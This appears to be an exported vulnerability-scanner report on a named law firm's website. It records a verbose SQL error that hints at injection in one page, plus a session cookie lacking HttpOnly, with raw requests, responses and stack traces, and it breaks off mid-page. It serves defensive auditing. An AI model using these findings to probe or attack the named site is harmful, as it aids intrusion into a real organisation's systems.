<input type="hidden" name="__VIEWSTATE" value="dDwyNDM2MjM1NDE7dDw7bDxpPDE+O2k8Mz47PjtsPHQ8O2w8aTwwPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxzY3JpcHRcPmFscGhhID0gWydBJywnQicsJ0MnLCdEJywnRScsJ0YnLCdHJywnSCcsJ0knLCdKJywnSycsJ0wnLCdNJywnTicsJ08nLCdQJywnUScsJ1InLCdTJywnVCcsJ1UnLCdWJywnVycsJ1gnLCdZJywnWiddXDtcPC9zY3JpcHRcPjs+Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XDx0YWJsZSBhbGlnbj1sZWZ0IGNlbGxwYWRkaW5nPTEgY2VsbHNwYWNpbmc9MFw+XDx0clw+XDx0ZCB2YWxpZ249dG9wXD5CT1NUT05cPEJSXD4yNjUgRnJhbmtsaW4gU3RyZWV0XDxCUlw+Qm9zdG9uLCBNQSAwMjExMFw8YnJcPlQgNjE3LjQ0OS42NTAwXDxiclw+RiA2MTcuNjA3LjkyMDBcPGJyXD5cPEJSXD5cPC90ZFw+XDx0ZCB3aWR0aD0nMjUnXD5cPC90ZFw+XDx0ZCB2YWxpZ249dG9wXD5IQVJURk9SRFw8QlJcPkNpdHlQbGFjZSBJXDxCUlw+MTg1IEFzeWx1bSBTdHJlZXRcPGJyXD5IYXJ0Zm9yZCwgQ1QgMDYxMDNcPGJyXD5UIDg2MC4yNzUuNjcwMFw8YnJcPkYgODYwLjcyNC4zMzk3XDxiclw+XDxCUlw+XDwvdGRcPlw8L3RyXD5cPHRyXD5cPHRkIHZhbGlnbj10b3BcPk5FVyBZT1JLXDxCUlw+MjQ1IFBhcmsgQXZlbnVlXDxCUlw+Mjd0aCBGbG9vclw8YnJcPk5ldyBZb3JrLCBOWSAxMDE2N1w8YnJcPlQgMjEyLjYwOS42ODAwXDxiclw+RiAyMTIuNjA5LjY5MjFcPGJyXD5cPEJSXD5cPC90ZFw+XDx0ZCB3aWR0aD0nMjUnXD5cPC90ZFw+XDx0ZCB2YWxpZ249dG9wXD5ORVdBUktcPEJSXD5Gb3VyIEdhdGV3YXkgQ2VudGVyXDxCUlw+MTAwIE11bGJlcnJ5IFN0cmVldFw8YnJcPk5ld2FyaywgTkogMDcxMDJcPGJyXD5UIDk3My42MjIuNDQ0NFw8YnJcPkYgOTczLjYyNC43MDcwXDxiclw+XDxCUlw+XDwvdGRcPlw8L3RyXD5cPHRyXD5cPHRkIHZhbGlnbj10b3BcPlBISUxBREVMUEhJQVw8QlJcPkJOWSBNZWxsb24gQ2VudGVyXDxCUlw+MTczNSBNYXJrZXQgU3RyZWV0LCBTdWl0ZSA3MDBcPGJyXD5QaGlsYWRlbHBoaWEsIFBBIDE5MTAzLTc1MDFcPGJyXD5UIDIxNS45NzkuMzgwMFw8YnJcPkYgMjE1Ljk3OS4zODk5XDxiclw+XDxCUlw+XDwvdGRcPlw8dGQgd2lkdGg9JzI1J1w+XDwvdGRcPlw8dGQgdmFsaWduPXRvcFw+U1RBTUZPUkRcPEJSXD5PbmUgQ2FudGVyYnVyeSBHcmVlblw8QlJcPjIwMSBCcm9hZCBTdHJlZXRcPGJyXD5TdGFtZm9yZCwgQ1QgIDA2OTAxXDxiclw+VCAyMDMuMzk5LjU5MDBcPGJyXD5GIDIwMy4zOTkuNTgwMFw8YnJcPlw8QlJcPlw8L3RkXD5cPC90clw+XDx0clw+XDx0ZCB2YWxpZ249dG9wXD5XSUxNSU5HVE9OXDxCUlw+UmVuYWlzc2FuY2UgQ2VudHJlXDxCUlw+NDA1IE4uIEtpbmcgU3RyZWV0LCA4dGggRmxvb3JcPGJyXD5XaWxtaW5ndG9uLCBERSAxOTgwMVw8YnJcPlQgMzAyLjk4NC42MzAwXDxiclw+RiAzMDIuOTg0LjYzOTlcPGJyXD5cPEJSXD5cPC90ZFw+XDx0ZCB3aWR0aD0nMjUnXD5cPC90ZFw+XDx0ZFw+XDwvdGRcPlw8dGRcPlw8L3RkXD5cPC90clw+XDwvdGFibGVcPjs+Pjs+Ozs+Oz4+Oz4+O2w8Q29udGFjdFNlbmRCdXR0b247Pj6Egdav41QWA/fH/xXWlxcfWFya1w==" />

<table id="pageTable" width="100%" height="100%" cellSpacing="1" cellPadding="1" align="right"
bgColor="#ffffff" border="0">
<tr>
<td width="15">&nbsp;</td>
<td align="left" valign="top">

We encourage you to explore our site to learn more about who we are and how we
can advance your business goals. For additional information, please contact us
at <a href="mailto:info@mccarter.com">
<span font-color="#000000">info@mccarter.com</span></a>.
<br>
<br>
</tr>
<tr>
<td width="15">&nbsp;</td>
<td align="left" valign="top">
<span id="Location"><table align=left cellpadding=1 cellspacing=0><tr><td valign=top>BOSTON<BR>265 Franklin Street<BR>Boston, MA 02110<br>T 617.449.6500<br>F 617.607.9200<br><BR></td><td width='25'></td><td valign=top>HARTFORD<BR>CityPlace I<BR>185 Asylum Street<br>Hartford, CT 06103<br>T 860.275.6700<br>F 860.724.3397<br><BR></td></tr><tr><td valign=top>NEW YORK<BR>245 Park Avenue<BR>27th Floor<br>New York, NY 10167<br>T 212.609.6800<br>F 212.609.6921<br><BR></td><td width='25'></td><td valign=top>NEWARK<BR>Four Gateway Center<BR>100 Mulberry Street<br>Newark, NJ 07102<br>T 973.622.4444<br>F 973.624.7070<br><BR></td></tr><tr><td valign=top>PHILADELPHIA<BR>BNY Mellon Center<BR>1735 Market Street, Suite 700<br>Philadelphia, PA 19103-7501<br>T 215.979.3800<br>F 215.979.3899<br><BR></td><td width='25'></td><td valign=top>STAMFORD<BR>One Canterbury Green<BR>201 Broad Street<br>Stamford, CT 06901<br>T 203.399.5900<br>F 203.399.5800<br><BR></td></tr><tr><td valign=top>WILMINGTON<BR>Renaissance Centre<BR>405 N. King Street, 8th Floor<br>Wilmington, DE 19801<br>T 302.984.6300<br>F 302.984.6399<br><BR></td><td width='25'></td><td></td><td></td></tr></table></span>

<!--Content Cell-->
<!--<table width="100%" border="0" cellspacing="0" cellpadding="0">
<!--<tr>
<td valign="top">
<span class="bodycopy">Please chosse the office you would
like to contact or enter your message below.<br>
</span>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td></td>
</tr>
</table>
</td>
</tr>-->
<!--<tr>
<td width="15">&nbsp;</td>
<td valign="top">
<div id="ContactFormPanel">

<TABLE class="bodycopy" align="left" border="0">
<TR>
<TD vAlign="top">Name
<BR>
<input name="ContactName" type="text" size="25" id="ContactName" class="bodycopy" /></TD>
<TD vAlign="top">Company
<BR>
<input name="ContactCompany" type="text" size="25" id="ContactCompany" class="bodycopy" /></TD>
</TR>
<TR>
<TD vAlign="top">Phone
<BR>
<input name="ContactPhone" type="text" size="25" id="ContactPhone" class="bodycopy" /></TD>
<TD vAlign="top">Email
<asp:RequiredFieldValidator id="ContactEmailValidator" ControlToValidate="ContactEmail" ErrorMessage="*"></asp:RequiredFieldValidator><BR>
<input name="ContactEmail" type="text" size="25" id="ContactEmail" class="bodycopy" /></TD>
</TR>
<TR>
<TD vAlign="top" colSpan="2">How can we help you?
<BR>
<textarea name="ContactComments" rows="5" cols="40" id="ContactComments" class="bodycopy"></textarea></TD>
</TR>
<TR>
<TD vAlign="top" colSpan="2"><BR>
<input type="image" name="ContactSendButton" id="ContactSendButton" src="images/new mccarter/subtitles/submit.jpg" alt="" border="0" /></TD>
</TR>
</TABLE>

</div>

</td>
</tr>
</table>-->
<!--End Content Cell-->
</td>
</tr>
</table>
</form>
<script language="Javascript">
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:"){
document.links[i].onclick = function () {return emailWarning();}
}
}
</script>
</body>
</HTML>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx

Request

GET /new/showlocationnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4338


<html>
<head>
<title>Incorrect syntax near '='.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '='.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '='.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '='.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '='.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /new/

/new/ CONFIRMED

http://www.mccarter.com/new/

Identified Cookie

ASP.NET_SessionId

Request

GET /new/ HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache,no-cache,no-cache,no-cache,no-cache,no-cache
Set-Cookie: ASP.NET_SessionId=0propq55ar2buf34xogra355; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47516



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
<HEAD>
<title>Welcome to McCarter</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

</HEAD>
<style>
A {text-decoration:none;
color:#666666;
font-face:arial;
font-size:11px}
A:Hover{
text-decoration:none;
color:#000000;
font-face:arial;
font-size:11px
}
</style>

<body id="homepage" link="#666666" vlink="#666666" alink="#666666" style="margin-top:0px;margin-bottom:0px" leftmargin=0 bottommargin=0 rightmargin=0 onLoad="decryptAll();">

<table id="pagetable" cellpadding=0 cellspacing=0 border=0 height="100%" width="100%">

<tr><td style="height:3%">&nbsp;</td></tr>

<tr>

<td style="height:94%" align="center" valign="middle">

<!--<td align="center" valign="middle"> -->

<table cellpadding =0 cellspacing =0>
<tr>
<td width="10%">&nbsp;</td>

<td width="80%" valign="middle">
<form name="Form1" method="post" action="homenew.aspx" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTA1OTU1Njc2ODt0PDtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw+YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw+Oz4+Ozs+Oz4+O3Q8O2w8aTw0Pjs+O2w8dDw7bDxpPDE+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTwyNT47Pj47bDxpPDA+O2k8Mj47aTw0PjtpPDY+O2k8OD47aTwxMD47aTwxMj47aTwxND47aTwxNj47aTwxOD47aTwyMD47aTwyMj47aTwyND47aTwyNj47aTwyOD47aTwzMD47aTwzMj47aTwzND47aTwzNj47aTwzOD47aTw0MD47aTw0Mj47aTw0ND47aTw0Nj47aTw0OD47PjtsPHQ8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MSIgY2xhc3M9ImJvZHljb3B5Ilw+QmFua3J1cHRjeSAmIFJlc3RydWN0dXJpbmcgXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTQiIGNsYXNzPSJib2R5Y29weSJcPkJ1c2luZXNzICYgRmluYW5jaWFsIFNlcnZpY2VzIExpdGlnYXRpb24gXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTEiIGNsYXNzPSJib2R5Y29weSJcPkNvbnN0cnVjdGlvblw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1IiBjbGFzcz0iYm9keWNvcHkiXD5Db3Jwb3JhdGUsIFNlY3VyaXRpZXMgYW5kIEZpbmFuY2lhbCBJbnN0aXR1dGlvbnNcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0zODI0IiBjbGFzcz0iYm9keWNvcHkiXD5DcmlzaXMgTWFuYWdlbWVudFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTM1NDAiIGNsYXNzPSJib2R5Y29weSJcPkUtRGlzY292ZXJ5XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MyIgY2xhc3M9ImJvZHljb3B5Ilw+RW52aXJvbm1lbnRhbFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIzIiBjbGFzcz0iYm9keWNvcHkiXD5FeGVjdXRpdmUgQ29tcGVuc2F0aW9uXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTkiIGNsYXNzPSJib2R5Y29weSJcPkZyYW5jaGlzaW5nIGFuZCBEaXN0cmlidXRpb24gTGF3XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjAiIGNsYXNzPSJib2R5Y29weSJcPkdvdmVybm1lbnQgQ29udHJhY3RzXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OSIgY2xhc3M9ImJvZHljb3B5Ilw+R292ZXJubWVudCBJbnZlc3RpZ2F0aW9ucyAmIFdoaXRlIENvbGxhciBDcmltaW5hbCBEZWZlbnNlXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9NSIgY2xhc3M9ImJvZHljb3B5Ilw+SGVhbHRoIENhcmVcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xOCIgY2xhc3M9ImJvZHljb3B5Ilw+SW1taWdyYXRpb25cPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz02IiBjbGFzcz0iYm9keWNvcHkiXD5JbnN1cmFuY2UgQ292ZXJhZ2VcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xMiIgY2xhc3M9ImJvZHljb3B5Ilw+SW50ZWxsZWN0dWFsIFByb3BlcnR5L0luZm9ybWF0aW9uIFRlY2hub2xvZ3lcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0yNzI2IiBjbGFzcz0iYm9keWNvcHkiXD5JbnRlcm5hdGlvbmFsXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjIiIGNsYXNzPSJib2R5Y29weSJcPkludmVzdG1lbnQgTWFuYWdlbWVudFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIiIGNsYXNzPSJib2R5Y29weSJcPkxhYm9yICYgRW1wbG95bWVudCBMYXdcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz00IiBjbGFzcz0iYm9keWNvcHkiXD5Qcml2YXRlIENsaWVudHNcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz03IiBjbGFzcz0iYm9keWNvcHkiXD5Qcm9kdWN0IExpYWJpbGl0eVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTEzIiBjbGFzcz0iYm9keWNvcHkiXD5QdWJsaWMgRmluYW5jZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsP